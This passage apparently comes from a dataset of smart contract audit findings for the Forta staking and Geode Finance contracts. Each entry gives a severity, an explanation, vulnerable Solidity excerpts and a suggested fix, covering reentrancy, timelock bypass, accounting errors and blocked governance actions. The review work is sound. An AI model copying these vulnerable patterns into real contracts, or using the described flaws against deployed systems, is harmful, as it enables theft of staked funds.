`shareId`, i.e. a delegated staking share. 
Each epoch gets their own reward distribution, and then `StakeAllocator` and `RewardsDistributor` contracts along with the Forta staking shares determine how much the users get.\\nTo actually allocate these rewards, a privileged account with the role `REWARDER_ROLE` calls the `RewardsDistributor.reward()` function with appropriate parameters to store the `amount` a `shareId` gets for that specific `epochNumber`, and then adds the `amount` to the `totalRewardsDistributed` contract variable for tracking. However, there is no check that the `shareId` already received rewards for that `epoch`. The new reward `amount` simply replaces the old reward `amount`, and `totalRewardsDistributed` gets the new `amount` added to it anyway. This causes inconsistencies with accounting in the `totalRewardsDistributed` variable.\\nAlthough `totalRewardsDistributed` is essentially isolated to the `sweep()` function to allow transferring out the reward tokens without taking away those tokens reserved for the reward distribution, this still creates an inconsistency, albeit a minor one in the context of the current system.\\nSimilarly, the `sweep()` function deducts the `totalRewardsDistributed` amount instead of the amount of pending rewards only. In other words, either there should be a different variable that tracks only pending rewards, or the `totalRewardsDistributed` should have token amounts deducted from it when users execute the `claimRewards()` function. 
Otherwise, after a few epochs there will be a really large `totalRewardsDistributed` amount that might not reflect the real amount of pending reward tokens left on the contract, and the `sweep()` function for the reward token is likely to fail for any amount being transferred out.\\n```\\nfunction reward(\\n uint8 subjectType,\\n uint256 subjectId,\\n uint256 amount,\\n uint256 epochNumber\\n) external onlyRole(REWARDER\\_ROLE) {\\n if (subjectType != NODE\\_RUNNER\\_SUBJECT) revert InvalidSubjectType(subjectType);\\n if (!\\_subjectGateway.isRegistered(subjectType, subjectId)) revert RewardingNonRegisteredSubject(subjectType, subjectId);\\n uint256 shareId = FortaStakingUtils.subjectToActive(getDelegatorSubjectType(subjectType), subjectId);\\n \\_rewardsPerEpoch[shareId][epochNumber] = amount;\\n totalRewardsDistributed += amount;\\n emit Rewarded(subjectType, subjectId, amount, epochNumber);\\n}\\n```\\n","Implement checks as appropriate to the `reward()` function to ensure correct behavior of `totalRewardsDistributed` tracking. Also, implement necessary changes to the tracking of pending rewards, if necessary.",,"```\\nfunction reward(\\n uint8 subjectType,\\n uint256 subjectId,\\n uint256 amount,\\n uint256 epochNumber\\n) external onlyRole(REWARDER\\_ROLE) {\\n if (subjectType != NODE\\_RUNNER\\_SUBJECT) revert InvalidSubjectType(subjectType);\\n if (!\\_subjectGateway.isRegistered(subjectType, subjectId)) revert RewardingNonRegisteredSubject(subjectType, subjectId);\\n uint256 shareId = FortaStakingUtils.subjectToActive(getDelegatorSubjectType(subjectType), subjectId);\\n \\_rewardsPerEpoch[shareId][epochNumber] = amount;\\n totalRewardsDistributed += amount;\\n emit Rewarded(subjectType, subjectId, amount, epochNumber);\\n}\\n```\\n" +Reentrancy in FortaStaking during ERC1155 mints,medium,"In the Forta staking system, the staking shares (both “active” and “inactive”) are represented as tokens implemented according to the `ERC1155` standard. 
The specific implementation that is being used utilizes a smart contract acceptance check `_doSafeTransferAcceptanceCheck()` upon mints to the recipient.\\n```\\ncontract FortaStaking is BaseComponentUpgradeable, ERC1155SupplyUpgradeable, SubjectTypeValidator, ISlashingExecutor, IStakeMigrator {\\n```\\n\\nThe specific implementation for `ERC1155SupplyUpgradeable` contracts can be found here, and the smart contract check can be found here.\\nThis opens up reentrancy into the system's flow. In fact, the reentrancy occurs on all mints that happen in the below functions, and it happens before a call to another Forta contract for allocation is made via either `_allocator.depositAllocation` or _allocator.withdrawAllocation:\\n```\\nfunction deposit(\\n uint8 subjectType,\\n uint256 subject,\\n uint256 stakeValue\\n) external onlyValidSubjectType(subjectType) notAgencyType(subjectType, SubjectStakeAgency.MANAGED) returns (uint256) {\\n if (address(subjectGateway) == address(0)) revert ZeroAddress(""subjectGateway"");\\n if (!subjectGateway.isStakeActivatedFor(subjectType, subject)) revert StakeInactiveOrSubjectNotFound();\\n address staker = \\_msgSender();\\n uint256 activeSharesId = FortaStakingUtils.subjectToActive(subjectType, subject);\\n bool reachedMax;\\n (stakeValue, reachedMax) = \\_getInboundStake(subjectType, subject, stakeValue);\\n if (reachedMax) {\\n emit MaxStakeReached(subjectType, subject);\\n }\\n uint256 sharesValue = stakeToActiveShares(activeSharesId, stakeValue);\\n SafeERC20.safeTransferFrom(stakedToken, staker, address(this), stakeValue);\\n\\n \\_activeStake.mint(activeSharesId, stakeValue);\\n \\_mint(staker, activeSharesId, sharesValue, new bytes(0));\\n emit StakeDeposited(subjectType, subject, staker, stakeValue);\\n \\_allocator.depositAllocation(activeSharesId, subjectType, subject, staker, stakeValue, sharesValue);\\n return sharesValue;\\n}\\n```\\n\\n```\\nfunction migrate(\\n uint8 oldSubjectType,\\n uint256 oldSubject,\\n uint8 
newSubjectType,\\n uint256 newSubject,\\n address staker\\n) external onlyRole(SCANNER\\_2\\_NODE\\_RUNNER\\_MIGRATOR\\_ROLE) {\\n if (oldSubjectType != SCANNER\\_SUBJECT) revert InvalidSubjectType(oldSubjectType);\\n if (newSubjectType != NODE\\_RUNNER\\_SUBJECT) revert InvalidSubjectType(newSubjectType); \\n if (isFrozen(oldSubjectType, oldSubject)) revert FrozenSubject();\\n\\n uint256 oldSharesId = FortaStakingUtils.subjectToActive(oldSubjectType, oldSubject);\\n uint256 oldShares = balanceOf(staker, oldSharesId);\\n uint256 stake = activeSharesToStake(oldSharesId, oldShares);\\n uint256 newSharesId = FortaStakingUtils.subjectToActive(newSubjectType, newSubject);\\n uint256 newShares = stakeToActiveShares(newSharesId, stake);\\n\\n \\_activeStake.burn(oldSharesId, stake);\\n \\_activeStake.mint(newSharesId, stake);\\n \\_burn(staker, oldSharesId, oldShares);\\n \\_mint(staker, newSharesId, newShares, new bytes(0));\\n emit StakeDeposited(newSubjectType, newSubject, staker, stake);\\n \\_allocator.depositAllocation(newSharesId, newSubjectType, newSubject, staker, stake, newShares);\\n}\\n```\\n\\n```\\nfunction initiateWithdrawal(\\n uint8 subjectType,\\n uint256 subject,\\n uint256 sharesValue\\n) external onlyValidSubjectType(subjectType) returns (uint64) {\\n address staker = \\_msgSender();\\n uint256 activeSharesId = FortaStakingUtils.subjectToActive(subjectType, subject);\\n if (balanceOf(staker, activeSharesId) == 0) revert NoActiveShares();\\n uint64 deadline = SafeCast.toUint64(block.timestamp) + \\_withdrawalDelay;\\n\\n \\_lockingDelay[activeSharesId][staker].setDeadline(deadline);\\n\\n uint256 activeShares = Math.min(sharesValue, balanceOf(staker, activeSharesId));\\n uint256 stakeValue = activeSharesToStake(activeSharesId, activeShares);\\n uint256 inactiveShares = stakeToInactiveShares(FortaStakingUtils.activeToInactive(activeSharesId), stakeValue);\\n SubjectStakeAgency agency = getSubjectTypeAgency(subjectType);\\n 
\\_activeStake.burn(activeSharesId, stakeValue);\\n \\_inactiveStake.mint(FortaStakingUtils.activeToInactive(activeSharesId), stakeValue);\\n \\_burn(staker, activeSharesId, activeShares);\\n \\_mint(staker, FortaStakingUtils.activeToInactive(activeSharesId), inactiveShares, new bytes(0));\\n if (agency == SubjectStakeAgency.DELEGATED || agency == SubjectStakeAgency.DELEGATOR) {\\n \\_allocator.withdrawAllocation(activeSharesId, subjectType, subject, staker, stakeValue, activeShares);\\n }\\n```\\n\\nAlthough this doesn't seem to be an issue in the current Forta system of contracts since the allocator's logic doesn't seem to be manipulable, this could still be dangerous as it opens up an external execution flow.","Consider introducing a reentrancy check or emphasize this behavior in the documentation, so that both other projects using this system later and future upgrades along with maintenance work on the Forta staking system itself are implemented safely.",,"```\\ncontract FortaStaking is BaseComponentUpgradeable, ERC1155SupplyUpgradeable, SubjectTypeValidator, ISlashingExecutor, IStakeMigrator {\\n```\\n" +Unnecessary code blocks that check the same condition,low,"In the `RewardsDistributor` there is a function that allows to set delegation fees for a `NodeRunner`. It adjusts the `fees[]` array for that node as appropriate. 
However, during its checks, it performs the same check twice in a row.\\n```\\nif (fees[1].sinceEpoch != 0) {\\n if (Accumulators.getCurrentEpochNumber() < fees[1].sinceEpoch + delegationParamsEpochDelay) revert SetDelegationFeeNotReady();\\n}\\nif (fees[1].sinceEpoch != 0) {\\n fees[0] = fees[1];\\n}\\n```\\n",Consider refactoring this under a single code block.,,```\\nif (fees[1].sinceEpoch != 0) {\\n if (Accumulators.getCurrentEpochNumber() < fees[1].sinceEpoch + delegationParamsEpochDelay) revert SetDelegationFeeNotReady();\\n}\\nif (fees[1].sinceEpoch != 0) {\\n fees[0] = fees[1];\\n}\\n```\\n +Event spam in RewardsDistributor.claimRewards,low,"The `RewardsDistributor` contract allows users to claim their rewards through the `claimRewards()` function. It does check to see whether or not the user has already claimed the rewards for a specific epoch that they are claiming for, but it does not check to see if the user has any associated rewards at all. This could lead to event `ClaimedRewards` being spammed by malicious users, especially on low gas chains.\\n```\\nfor (uint256 i = 0; i < epochNumbers.length; i++) {\\n if (\\_claimedRewardsPerEpoch[shareId][epochNumbers[i]][\\_msgSender()]) revert AlreadyClaimed();\\n \\_claimedRewardsPerEpoch[shareId][epochNumbers[i]][\\_msgSender()] = true;\\n uint256 epochRewards = \\_availableReward(shareId, isDelegator, epochNumbers[i], \\_msgSender());\\n SafeERC20.safeTransfer(rewardsToken, \\_msgSender(), epochRewards);\\n emit ClaimedRewards(subjectType, subjectId, \\_msgSender(), epochNumbers[i], epochRewards);\\n```\\n",Add a check for rewards amounts being greater than 0.,,"```\\nfor (uint256 i = 0; i < epochNumbers.length; i++) {\\n if (\\_claimedRewardsPerEpoch[shareId][epochNumbers[i]][\\_msgSender()]) revert AlreadyClaimed();\\n \\_claimedRewardsPerEpoch[shareId][epochNumbers[i]][\\_msgSender()] = true;\\n uint256 epochRewards = \\_availableReward(shareId, isDelegator, epochNumbers[i], \\_msgSender());\\n 
SafeERC20.safeTransfer(rewardsToken, \\_msgSender(), epochRewards);\\n emit ClaimedRewards(subjectType, subjectId, \\_msgSender(), epochNumbers[i], epochRewards);\\n```\\n" +Lack of a check for the subject's stake for reviewSlashProposalParameters,low,"In the `SlashingController` contract, the address with the `SLASHING_ARBITER_ROLE` may call the `reviewSlashProposalParameters()` function to adjust the slashing proposal to a new `_subjectId` and `_subjectType`. However, unlike in the `proposeSlash()` function, there is no check for that subject having any stake at all.\\nWhile it may be assumed that the review function will be called by a privileged and knowledgeable actor, this additional check may avoid accidental mistakes.\\n```\\nif (subjectGateway.totalStakeFor(\\_subjectType, \\_subjectId) == 0) revert ZeroAmount(""subject stake"");\\n```\\n\\n```\\nif (\\_subjectType != proposals[\\_proposalId].subjectType || \\_subjectId != proposals[\\_proposalId].subjectId) {\\n \\_unfreeze(\\_proposalId);\\n \\_freeze(\\_subjectType, \\_subjectId);\\n}\\n```\\n",Add a check for the new subject having stake to slash.,,"```\\nif (subjectGateway.totalStakeFor(\\_subjectType, \\_subjectId) == 0) revert ZeroAmount(""subject stake"");\\n```\\n" +Comment and code inconsistencies,low,"During the audit a few inconsistencies were found between what the comments say and what the implemented code actually did.\\nSubject Type Agency for Scanner Subjects\\nIn the `SubjectTypeValidator`, the comment says that the `SCANNER_SUBJECT` is of type `DIRECT` agency type, i.e. it can be directly staked on by multiple different stakers. 
However, we found a difference in the implementation, where the concerned subject is defined as type `MANAGED` agency type, which says that it cannot be staked on directly; instead it's a delegated type and the allocation is supposed to be managed by its manager.\\n```\\n\\* - SCANNER\\_SUBJECT --> DIRECT\\n```\\n\\n```\\n} else if (subjectType == SCANNER\\_SUBJECT) {\\n return SubjectStakeAgency.MANAGED;\\n```\\n\\nDispatch refers to ERC721 tokens as ERC1155\\nOne of the comments describing the functionality to `link` and `unlink` agents and scanners refers to them as ERC1155 tokens, when in reality they are ERC721.\\n```\\n/\\*\\*\\n \\* @notice Assigns the job of running an agent to a scanner.\\n \\* @dev currently only allowed for DISPATCHER\\_ROLE (Assigner software).\\n \\* @dev emits Link(agentId, scannerId, true) event.\\n \\* @param agentId ERC1155 token id of the agent.\\n \\* @param scannerId ERC1155 token id of the scanner.\\n \\*/\\n```\\n\\nNodeRunnerRegistryCore comment that implies the reverse of what happens\\nA comment describing a helper function that returns address for a given scanner ID describes the opposite behavior. It is the same comment for the function just above that actually does what the comment says.\\n```\\n/// Converts scanner address to uint256 for FortaStaking Token Id.\\nfunction scannerIdToAddress(uint256 scannerId) public pure returns (address) {\\n return address(uint160(scannerId));\\n}\\n```\\n\\nScannerToNodeRunnerMigration comment that says that no NodeRunner tokens must be owned\\nFor the migration from Scanners to NodeRunners, a comment in the beginning of the file implies that for the system to work correctly, there must be no NodeRunner tokens owned prior to migration. 
After a conversation with the Forta Foundation team, it appears that this was an early design choice that is no longer relevant.\\n```\\n\\* @param nodeRunnerId If set as 0, a new NodeRunnerRegistry ERC721 will be minted to nodeRunner (but it must not own any prior),\\n```\\n\\n```\\n\\* @param nodeRunnerId If set as 0, a new NodeRunnerRegistry ERC721 will be minted to nodeRunner (but it must not own any prior),\\n```\\n",Verify the operational logic and fix either the concerned comments or defined logic as per the need.,,```\\n\\* - SCANNER\\_SUBJECT --> DIRECT\\n```\\n +Oracle's _sanityCheck for prices will not work with slashing,high,"The `_sanityCheck` is verifying that the new price didn't change significantly:\\n```\\nuint256 maxPrice = curPrice +\\n ((curPrice \\*\\n self.PERIOD\\_PRICE\\_INCREASE\\_LIMIT \\*\\n \\_periodsSinceUpdate) / PERCENTAGE\\_DENOMINATOR);\\n\\nuint256 minPrice = curPrice -\\n ((curPrice \\*\\n self.PERIOD\\_PRICE\\_DECREASE\\_LIMIT \\*\\n \\_periodsSinceUpdate) / PERCENTAGE\\_DENOMINATOR);\\n\\nrequire(\\n \\_newPrice >= minPrice && \\_newPrice <= maxPrice,\\n ""OracleUtils: price is insane""\\n```\\n\\nWhile the rewards of staking can be reasonably predicted, the balances may also be changed due to slashing. So any slashing event should reduce the price, and if enough ETH is slashed, the price will drop heavily. The oracle will not be updated because of a sanity check. After that, there will be an arbitrage opportunity, and everyone will be incentivized to withdraw as soon as possible. That process will inevitably devaluate gETH to zero. 
The severity of this issue is also amplified by the fact that operators have no skin in the game and won't lose anything from slashing.",Make sure that slashing can be adequately processed when updating the price.,,"```\\nuint256 maxPrice = curPrice +\\n ((curPrice \\*\\n self.PERIOD\\_PRICE\\_INCREASE\\_LIMIT \\*\\n \\_periodsSinceUpdate) / PERCENTAGE\\_DENOMINATOR);\\n\\nuint256 minPrice = curPrice -\\n ((curPrice \\*\\n self.PERIOD\\_PRICE\\_DECREASE\\_LIMIT \\*\\n \\_periodsSinceUpdate) / PERCENTAGE\\_DENOMINATOR);\\n\\nrequire(\\n \\_newPrice >= minPrice && \\_newPrice <= maxPrice,\\n ""OracleUtils: price is insane""\\n```\\n" +MiniGovernance - fetchUpgradeProposal will always revert,high,"In the function `fetchUpgradeProposal()`, `newProposal()` is called with a hard coded `duration` of 4 weeks. This means the function will always revert since `newProposal()` checks that the proposal `duration` is not more than the constant `MAX_PROPOSAL_DURATION` of 2 weeks. Effectively, this leaves MiniGovernance non-upgradeable.\\n```\\nGEM.newProposal(proposal.CONTROLLER, 2, proposal.NAME, 4 weeks);\\n```\\n\\n```\\nrequire(\\n duration <= MAX\\_PROPOSAL\\_DURATION,\\n ""GeodeUtils: duration exceeds MAX\\_PROPOSAL\\_DURATION""\\n);\\n```\\n",Switch the hard coded proposal duration to 2 weeks.,,"```\\nGEM.newProposal(proposal.CONTROLLER, 2, proposal.NAME, 4 weeks);\\n```\\n" +Updating interfaces of derivatives is done in a dangerous and unpredictable manner.,medium,"Geode Finance codebase provides planet maintainers with the ability to enable or disable different contracts to act as the main token contract. In fact, multiple separate contracts can be used at the same time if decided so by the planet maintainer. 
Those contracts will have shared balances but will not share the allowances as you can see below:\\n```\\nmapping(uint256 => mapping(address => uint256)) private \\_balances;\\n```\\n\\n```\\nmapping(address => mapping(address => uint256)) private \\_allowances;\\n```\\n\\nUnfortunately, this approach comes with some implications that are very hard to predict as they involve interactions with other systems, but is possible to say that the consequences of those implications will most always be negative. We will not be able to outline all the implications of this issue, but we can try and outline the pattern that they all would follow.\\nThere are really two ways to update an interface: set the new one and immediately unset the old one, or have them both run in parallel for some time. Let's look at them one by one.\\nin the first case, the old interface is disabled immediately. Given that interfaces share balances that will lead to some very serious consequences. Imagine the following sequence:\\nAlice deposits her derivatives into the DWP contract for liquidity mining.\\nPlanet maintainer updates the interface and immediately disables the old one.\\nDWP contract now has the old tokens and the new ones. But only the new ones are accounted for in the storage and thus can be withdrawn. Unfortunately, the old tokens are disabled meaning that now both old and new tokens are lost.\\nThis can happen in pretty much any contract and not just the DWP token. Unless the holders had enough time to withdraw the derivatives back to their wallets all the funds deposited into contracts could be lost.\\nThis leads us to the second case where the two interfaces are active in parallel. This would solve the issue above by allowing Alice to withdraw the old tokens from the DWP and make the new tokens follow. Unfortunately, there is an issue in that case as well.\\nSome DeFi contracts allow their owners to withdraw any tokens that are not accounted for by the internal accounting. 
DWP allows the withdrawal of admin fees if the contract has more tokens than `balances[]` store. Some contracts even allow to withdraw funds that were accidentally sent to the contract by people. Either to recover them or just as a part of dust collection. Let's call such contracts “dangerous contracts” for our purposes.\\nAlice deposits her derivatives into the dangerous contract.\\nPlanet maintainer sets a new interface.\\nOwner of the dangerous contract sees that some odd and unaccounted tokens landed in the contract. He learns those are real and are part of Geode ecosystem. So he takes them.\\nOld tokens will follow the new tokens. That means Alice now has no claim to them and the contract that they just left has broken accounting since numbers there are not backed by tokens anymore.\\nOne other issue we would like to highlight here is that despite the contracts being expected to have separate allowances, if the old contract has the allowance set, the initial 0 value of the new one will be ignored. Here is an example:\\nAlice approves Bob for 100 derivatives.\\nPlanet maintainer sets a new interface. The new interface has no allowance from Alice to Bob.\\nBob still can transfer new tokens from Alice to himself by transferring the old tokens for which he still has the allowance. New token balances will be updated accordingly.\\nAlice could also give Bob an allowance of 100 tokens in the new contract since that was her original intent, but this would mean that Bob now has 200 token allowance.\\nThis is extremely convoluted and will most likely result in errors made by the planet maintainers when updating the interfaces.",The safest option is to only allow a list of whitelisted interfaces to be used that are well-documented and audited. 
Planet maintainers could then choose the once that they see fit.,,```\\nmapping(uint256 => mapping(address => uint256)) private \\_balances;\\n```\\n +Only the GOVERNANCE can initialize the Portal,medium,"In the Portal's `initialize` function, the `_GOVERNANCE` is passed as a parameter:\\n```\\nfunction initialize(\\n address \\_GOVERNANCE,\\n address \\_gETH,\\n address \\_ORACLE\\_POSITION,\\n address \\_DEFAULT\\_gETH\\_INTERFACE,\\n address \\_DEFAULT\\_DWP,\\n address \\_DEFAULT\\_LP\\_TOKEN,\\n address \\_MINI\\_GOVERNANCE\\_POSITION,\\n uint256 \\_GOVERNANCE\\_TAX,\\n uint256 \\_COMET\\_TAX,\\n uint256 \\_MAX\\_MAINTAINER\\_FEE,\\n uint256 \\_BOOSTRAP\\_PERIOD\\n) public virtual override initializer {\\n \\_\\_ReentrancyGuard\\_init();\\n \\_\\_Pausable\\_init();\\n \\_\\_ERC1155Holder\\_init();\\n \\_\\_UUPSUpgradeable\\_init();\\n\\n GEODE.SENATE = \\_GOVERNANCE;\\n GEODE.GOVERNANCE = \\_GOVERNANCE;\\n GEODE.GOVERNANCE\\_TAX = \\_GOVERNANCE\\_TAX;\\n GEODE.MAX\\_GOVERNANCE\\_TAX = \\_GOVERNANCE\\_TAX;\\n GEODE.SENATE\\_EXPIRY = type(uint256).max;\\n\\n STAKEPOOL.GOVERNANCE = \\_GOVERNANCE;\\n STAKEPOOL.gETH = IgETH(\\_gETH);\\n STAKEPOOL.TELESCOPE.gETH = IgETH(\\_gETH);\\n STAKEPOOL.TELESCOPE.ORACLE\\_POSITION = \\_ORACLE\\_POSITION;\\n STAKEPOOL.TELESCOPE.MONOPOLY\\_THRESHOLD = 20000;\\n\\n updateStakingParams(\\n \\_DEFAULT\\_gETH\\_INTERFACE,\\n \\_DEFAULT\\_DWP,\\n \\_DEFAULT\\_LP\\_TOKEN,\\n \\_MAX\\_MAINTAINER\\_FEE,\\n \\_BOOSTRAP\\_PERIOD,\\n type(uint256).max,\\n type(uint256).max,\\n \\_COMET\\_TAX,\\n 3 days\\n );\\n```\\n\\nBut then it calls the `updateStakingParams` function, which requires the `msg.sender` to be the governance:\\n```\\nfunction updateStakingParams(\\n address \\_DEFAULT\\_gETH\\_INTERFACE,\\n address \\_DEFAULT\\_DWP,\\n address \\_DEFAULT\\_LP\\_TOKEN,\\n uint256 \\_MAX\\_MAINTAINER\\_FEE,\\n uint256 \\_BOOSTRAP\\_PERIOD,\\n uint256 \\_PERIOD\\_PRICE\\_INCREASE\\_LIMIT,\\n uint256 \\_PERIOD\\_PRICE\\_DECREASE\\_LIMIT,\\n 
uint256 \\_COMET\\_TAX,\\n uint256 \\_BOOST\\_SWITCH\\_LATENCY\\n) public virtual override {\\n require(\\n msg.sender == GEODE.GOVERNANCE,\\n ""Portal: sender not GOVERNANCE""\\n );\\n```\\n\\nSo only the future governance can initialize the `Portal`. In the case of the Geode protocol, the governance will be represented by a token contract, making it hard to initialize promptly. Initialization should be done by an actor that is more flexible than governance.",Split the `updateStakingParams` function into public and private ones and use them accordingly.,,"```\\nfunction initialize(\\n address \\_GOVERNANCE,\\n address \\_gETH,\\n address \\_ORACLE\\_POSITION,\\n address \\_DEFAULT\\_gETH\\_INTERFACE,\\n address \\_DEFAULT\\_DWP,\\n address \\_DEFAULT\\_LP\\_TOKEN,\\n address \\_MINI\\_GOVERNANCE\\_POSITION,\\n uint256 \\_GOVERNANCE\\_TAX,\\n uint256 \\_COMET\\_TAX,\\n uint256 \\_MAX\\_MAINTAINER\\_FEE,\\n uint256 \\_BOOSTRAP\\_PERIOD\\n) public virtual override initializer {\\n \\_\\_ReentrancyGuard\\_init();\\n \\_\\_Pausable\\_init();\\n \\_\\_ERC1155Holder\\_init();\\n \\_\\_UUPSUpgradeable\\_init();\\n\\n GEODE.SENATE = \\_GOVERNANCE;\\n GEODE.GOVERNANCE = \\_GOVERNANCE;\\n GEODE.GOVERNANCE\\_TAX = \\_GOVERNANCE\\_TAX;\\n GEODE.MAX\\_GOVERNANCE\\_TAX = \\_GOVERNANCE\\_TAX;\\n GEODE.SENATE\\_EXPIRY = type(uint256).max;\\n\\n STAKEPOOL.GOVERNANCE = \\_GOVERNANCE;\\n STAKEPOOL.gETH = IgETH(\\_gETH);\\n STAKEPOOL.TELESCOPE.gETH = IgETH(\\_gETH);\\n STAKEPOOL.TELESCOPE.ORACLE\\_POSITION = \\_ORACLE\\_POSITION;\\n STAKEPOOL.TELESCOPE.MONOPOLY\\_THRESHOLD = 20000;\\n\\n updateStakingParams(\\n \\_DEFAULT\\_gETH\\_INTERFACE,\\n \\_DEFAULT\\_DWP,\\n \\_DEFAULT\\_LP\\_TOKEN,\\n \\_MAX\\_MAINTAINER\\_FEE,\\n \\_BOOSTRAP\\_PERIOD,\\n type(uint256).max,\\n type(uint256).max,\\n \\_COMET\\_TAX,\\n 3 days\\n );\\n```\\n" +The maintainer of the MiniGovernance can block the changeMaintainer function,medium,"Every entity with an ID has a controller and a maintainer. 
The controller tends to have more control, and the maintainer is mostly used for operational purposes. So the controller should be able to change the maintainer if that is required. Indeed we see that it is possible in the MiniGovernance too:\\n```\\nfunction changeMaintainer(\\n bytes calldata password,\\n bytes32 newPasswordHash,\\n address newMaintainer\\n)\\n external\\n virtual\\n override\\n onlyPortal\\n whenNotPaused\\n returns (bool success)\\n{\\n require(\\n SELF.PASSWORD\\_HASH == bytes32(0) ||\\n SELF.PASSWORD\\_HASH ==\\n keccak256(abi.encodePacked(SELF.ID, password))\\n );\\n SELF.PASSWORD\\_HASH = newPasswordHash;\\n\\n \\_refreshSenate(newMaintainer);\\n\\n success = true;\\n}\\n```\\n\\nHere the `changeMaintainer` function can only be called by the Portal, and only the controller can initiate that call. But the maintainer can pause the MiniGovernance, which will make this call revert because the `_refreshSenate` function has the `whenNotPaused` modifier. Thus maintainer could intentionally prevent the controller from replacing it by another maintainer.",Make sure that the controller can always change the malicious maintainer.,,"```\\nfunction changeMaintainer(\\n bytes calldata password,\\n bytes32 newPasswordHash,\\n address newMaintainer\\n)\\n external\\n virtual\\n override\\n onlyPortal\\n whenNotPaused\\n returns (bool success)\\n{\\n require(\\n SELF.PASSWORD\\_HASH == bytes32(0) ||\\n SELF.PASSWORD\\_HASH ==\\n keccak256(abi.encodePacked(SELF.ID, password))\\n );\\n SELF.PASSWORD\\_HASH = newPasswordHash;\\n\\n \\_refreshSenate(newMaintainer);\\n\\n success = true;\\n}\\n```\\n" +Entities are not required to be initiated,medium,"Every entity (Planet, Comet, Operator) has a 3-step creation process:\\nCreation of the proposal.\\nApproval of the proposal.\\nInitiation of the entity.\\nThe last step is crucial, but it is never explicitly checked that the entity is initialized. 
The initiation always includes the `initiator` modifier that works with the `""initiated""` slot on DATASTORE:\\n```\\nmodifier initiator(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 \\_TYPE,\\n uint256 \\_id,\\n address \\_maintainer\\n) {\\n require(\\n msg.sender == DATASTORE.readAddressForId(\\_id, ""CONTROLLER""),\\n ""MaintainerUtils: sender NOT CONTROLLER""\\n );\\n require(\\n DATASTORE.readUintForId(\\_id, ""TYPE"") == \\_TYPE,\\n ""MaintainerUtils: id NOT correct TYPE""\\n );\\n require(\\n DATASTORE.readUintForId(\\_id, ""initiated"") == 0,\\n ""MaintainerUtils: already initiated""\\n );\\n\\n DATASTORE.writeAddressForId(\\_id, ""maintainer"", \\_maintainer);\\n\\n \\_;\\n\\n DATASTORE.writeUintForId(\\_id, ""initiated"", block.timestamp);\\n\\n emit IdInitiated(\\_id, \\_TYPE);\\n}\\n```\\n\\nBut this slot is never actually checked when the entities are used. While we did not find any profitable attack vector using uninitiated entities, the code will be upgraded, which may allow for possible attack vectors related to this issue.",Make sure the entities are initiated before they are used.,,"```\\nmodifier initiator(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 \\_TYPE,\\n uint256 \\_id,\\n address \\_maintainer\\n) {\\n require(\\n msg.sender == DATASTORE.readAddressForId(\\_id, ""CONTROLLER""),\\n ""MaintainerUtils: sender NOT CONTROLLER""\\n );\\n require(\\n DATASTORE.readUintForId(\\_id, ""TYPE"") == \\_TYPE,\\n ""MaintainerUtils: id NOT correct TYPE""\\n );\\n require(\\n DATASTORE.readUintForId(\\_id, ""initiated"") == 0,\\n ""MaintainerUtils: already initiated""\\n );\\n\\n DATASTORE.writeAddressForId(\\_id, ""maintainer"", \\_maintainer);\\n\\n \\_;\\n\\n DATASTORE.writeUintForId(\\_id, ""initiated"", block.timestamp);\\n\\n emit IdInitiated(\\_id, \\_TYPE);\\n}\\n```\\n" +The blameOperator can be called for an alienated validator,medium,"The `blameOperator` function is designed to be called by anyone. 
If some operator did not signal to exit in time, anyone can blame and imprison this operator.\\n```\\n/\\*\\*\\n \\* @notice allows improsening an Operator if the validator have not been exited until expectedExit\\n \\* @dev anyone can call this function\\n \\* @dev if operator has given enough allowence, they can rotate the validators to avoid being prisoned\\n \\*/\\nfunction blameOperator(\\n StakePool storage self,\\n DataStoreUtils.DataStore storage DATASTORE,\\n bytes calldata pk\\n) external {\\n if (\\n block.timestamp > self.TELESCOPE.\\_validators[pk].expectedExit &&\\n self.TELESCOPE.\\_validators[pk].state != 3\\n ) {\\n OracleUtils.imprison(\\n DATASTORE,\\n self.TELESCOPE.\\_validators[pk].operatorId\\n );\\n }\\n}\\n```\\n\\nThe problem is that it can be called for any state that is not `3` (self.TELESCOPE._validators[pk].state != 3). But it should only be called for active validators whose state equals `2`. So the `blameOperator` can be called an infinite amount of time for alienated or not approved validators. These types of validators cannot switch to state `3`.\\nThe severity of the issue is mitigated by the fact that this function is currently unavailable for users to call. 
But it is intended to be external once the withdrawal process is in place.",Make sure that you can only blame the operator of an active validator.,,"```\\n/\\*\\*\\n \\* @notice allows improsening an Operator if the validator have not been exited until expectedExit\\n \\* @dev anyone can call this function\\n \\* @dev if operator has given enough allowence, they can rotate the validators to avoid being prisoned\\n \\*/\\nfunction blameOperator(\\n StakePool storage self,\\n DataStoreUtils.DataStore storage DATASTORE,\\n bytes calldata pk\\n) external {\\n if (\\n block.timestamp > self.TELESCOPE.\\_validators[pk].expectedExit &&\\n self.TELESCOPE.\\_validators[pk].state != 3\\n ) {\\n OracleUtils.imprison(\\n DATASTORE,\\n self.TELESCOPE.\\_validators[pk].operatorId\\n );\\n }\\n}\\n```\\n" +Latency timelocks on certain functions can be bypassed,medium,"The functions `switchMaintainerFee()` and `switchWithdrawalBoost()` add a latency of typically three days to the current timestamp at which the new value is meant to be valid. However, they don't limit the number of times this value can be changed within the latency period. This allows a malicious maintainer to set their desired value twice and effectively make the change immediately. Let's take the first function as an example. The first call to it sets a value as the `newFee`, moving the old value to `priorFee`, which is effectively the fee in use until the time lock is up. 
A follow-up call to the function with the same value as a parameter would mean the “new” value overwrites the old `priorFee` while remaining in the queue for the switch.\\n```\\nfunction switchMaintainerFee(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 id,\\n uint256 newFee\\n) external {\\n DATASTORE.writeUintForId(\\n id,\\n ""priorFee"",\\n DATASTORE.readUintForId(id, ""fee"")\\n );\\n DATASTORE.writeUintForId(\\n id,\\n ""feeSwitch"",\\n block.timestamp + FEE\\_SWITCH\\_LATENCY\\n );\\n DATASTORE.writeUintForId(id, ""fee"", newFee);\\n\\n emit MaintainerFeeSwitched(\\n id,\\n newFee,\\n block.timestamp + FEE\\_SWITCH\\_LATENCY\\n );\\n}\\n```\\n\\n```\\nfunction getMaintainerFee(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 id\\n) internal view returns (uint256 fee) {\\n if (DATASTORE.readUintForId(id, ""feeSwitch"") > block.timestamp) {\\n return DATASTORE.readUintForId(id, ""priorFee"");\\n }\\n return DATASTORE.readUintForId(id, ""fee"");\\n}\\n```\\n",Add a check to make sure only one value can be set between time lock periods.,,"```\\nfunction 